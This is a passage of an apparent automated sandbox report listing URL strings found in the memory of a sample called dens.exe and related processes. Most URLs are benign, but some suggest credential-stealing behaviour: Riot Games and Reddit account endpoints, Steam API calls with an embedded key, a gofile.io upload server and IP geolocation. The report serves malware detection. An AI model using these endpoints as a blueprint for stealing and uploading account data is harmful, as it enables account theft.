            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1690034883.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
            Source: _uuid.pyd.0.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
            Source: dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeS
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD6D000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1690034883.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
            Source: dens.exe, 00000001.00000002.2062990584.000002D9ABAE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.kill
            Source: dens.exe, 00000001.00000002.2062990584.000002D9ABAE0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.returncode
            Source: dens.exe, 00000001.00000002.2062811455.000002D9AB9E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/3/library/subprocess#subprocess.Popen.terminate
            Source: dens.exe, 00000001.00000002.2062310780.000002D9AB6B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://docs.python.org/library/itertools.html#recipes
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE90618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE90618000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
            Source: qmgr.db.52.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
            Source: qmgr.db.52.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE90618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE90618000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
            Source: svchost.exe, 00000034.00000003.1792575862.000001DE9064D000.00000004.00000800.00020000.00000000.sdmp, qmgr.db.52.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
            Source: mshta.exe, 0000001E.00000003.1791248037.000001E0907A9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001E.00000003.1791490293.000001E0907AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001E.00000003.1815210960.000001E0907AA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000001E.00000002.1818084355.000001E0907AA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://en.w%
            Source: qmgr.db.52.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
            Source: dens.exe, 00000001.00000002.2062436664.000002D9AB7B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tar.gz
            Source: dens.exe, 00000001.00000002.2062436664.000002D9AB7B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://foo/bar.tgz
            Source: dens.exe, 00000001.00000002.2060821031.000002D9AB255000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2044923552.000002D9AB254000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2052355353.000002D9AB255000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036788862.000002D9AB253000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2033820717.000002D9AB24E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://httpbin.org/post
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://ip-api.com/json0
            Source: powershell.exe, 00000052.00000002.1907212473.00000217BD754000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1907212473.00000217BD611000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1892866312.00000217AEF03000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD6D000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1690034883.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD6D000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663289848.00000107DAD6F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663289848.00000107DAD6F000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1690034883.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
            Source: dens.exe, 00000001.00000002.2062811455.000002D9AB9E0000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2062625021.000002D9AB8C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://opensource.apple.com/source/CF/CF-744.18/CFBinaryPList.c
            Source: powershell.exe, 00000052.00000002.1892866312.00000217AEE7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1892866312.00000217AECF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
            Source: dens.exe, 00000001.00000002.2063237923.000002D9ABD20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://python.org
            Source: dens.exe, 00000001.00000002.2060821031.000002D9AB255000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2044923552.000002D9AB254000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2052355353.000002D9AB255000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036788862.000002D9AB253000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2033820717.000002D9AB24E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://python.org/
            Source: dens.exe, 00000001.00000002.2063237923.000002D9ABD20000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://python.org:80
            Source: powershell.exe, 00000052.00000002.1892866312.00000217AD5A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: dens.exe, 00000000.00000003.1682761264.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677763229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/
            Source: dens.exe, 00000000.00000003.1682761264.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1682761264.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677916085.00000107DAD74000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677763229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1892866312.00000217AECF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
            Source: powershell.exe, 00000052.00000002.1892866312.00000217AEE7C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000052.00000002.1892866312.00000217AECF9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
            Source: dens.exe, 00000001.00000002.2062625021.000002D9AB8C0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.apple.com/DTDs/PropertyList-1.0.dtd
            Source: dens.exe, 00000000.00000003.1662792406.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663365617.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662307242.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672986256.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1691479731.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662173318.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1670723858.00000107DAD6D000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662453626.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672249137.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661942418.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1672034357.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662552489.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673743229.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1676466121.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662659826.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1673118322.00000107DAD66000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1662872002.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663046330.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1663178145.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1661560840.00000107DAD62000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1690034883.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
            Source: dens.exe, 00000001.00000003.1953230654.000002D9AB2E5000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2041941512.000002D9AB35B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1772883134.000002D9AB2E5000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1702755471.000002D9AB333000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2044144518.000002D9AB35D000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2028227051.000002D9AB2E5000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2037555294.000002D9AB2EE000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1703198542.000002D9AB356000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2047336297.000002D9AB371000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.iana.org/assignments/tls-parameters/tls-parameters.xml#tls-parameters-6
            Source: dens.exe, 00000001.00000002.2065840067.000002D9AC8B0000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://account.riotgames.com/api/account/v1/user
            Source: dens.exe, 00000001.00000003.1775700959.000002D9ABFF2000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2065840067.000002D9AC8B0000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781000596.000002D9AC026000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2029099108.000002D9AC036000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776457067.000002D9AC037000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036571955.000002D9AC081000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://accounts.reddit.com/api/access_token
            Source: powershell.exe, 00000052.00000002.1892866312.00000217AD5A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
            Source: dens.exe, 00000001.00000003.2028056493.000002D9AD0C3000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2028962685.000002D9ACB74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.braintreegateway.com/merchants/49pp2rp4phym7387/client_api/v
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.gofile.io/getServer
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000002.2065840067.000002D9AC830000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/IPlayerService/GetSteamLevel/v1/?key=440D7F4D810EF9298D25EDDF37C1F902&s
            Source: dens.exe, 00000001.00000002.2066236732.000002D9AC968000.00000004.00001000.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1781669123.000002D9AC027000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.2036994849.000002D9AC03B000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000001.00000003.1776089089.000002D9AC017000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/ISteamUser/GetPlayerSummaries/v0002/?key=440D7F4D810EF9298D25EDDF37C1F9
            Source: dens.exe, 00000001.00000003.2028962685.000002D9ACB74000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.stripe.com/v
            Source: dens.exe, 00000000.00000003.1677230307.00000107DAD69000.00000004.00000020.00020000.00000000.sdmp, dens.exe, 00000000.00000003.1677230307.00000107DAD6B000.00000004.00000020.00020000.00000000.sdmp, METADATA15.0.drString found in binary or memory: https://backportstarfile.readthedocs.io/en/latest/?badge=latest
            Source: dens.exe, 00000000.00000003.1676683442.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://badge.fury.io/py/autocommand)
            Source: dens.exe, 00000000.00000003.1676683442.00000107DAD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://badge.fury.io/py/autocommand.svg)
